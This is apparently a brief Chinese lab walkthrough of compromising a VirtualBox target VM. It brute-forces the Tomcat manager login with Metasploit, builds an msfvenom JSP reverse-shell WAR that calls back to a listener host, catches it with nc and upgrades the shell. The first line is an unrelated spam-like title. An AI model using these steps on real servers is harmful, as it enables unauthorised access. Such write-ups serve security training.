百度新闻源网站互联网创业项目的效果
导入vb,设置桥接

打开kali,扫描主机 172.16.2.7
17
扫描一下服务

看一下8080端口tomcat


尝试爆破
msfconsole
search login tomcat

use 0 这里的0是上面扫描login出来的序号,扫出来多少填多少
set rhost 172.16.2.7
run

![]()
得出账号密码tomcat role1


在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.2.63 LPORT=6688 -f war -o upfine.war
输入后将生成upfine.war文件

kali开启监听
nc -lvvp 6688
然后将upfine.war文件进行上传部署并点击upfine进行访问,成功获得shell权限

python3 -c 'import pty;pty.spawn("/bin/bash")' 升级下shell窗口。

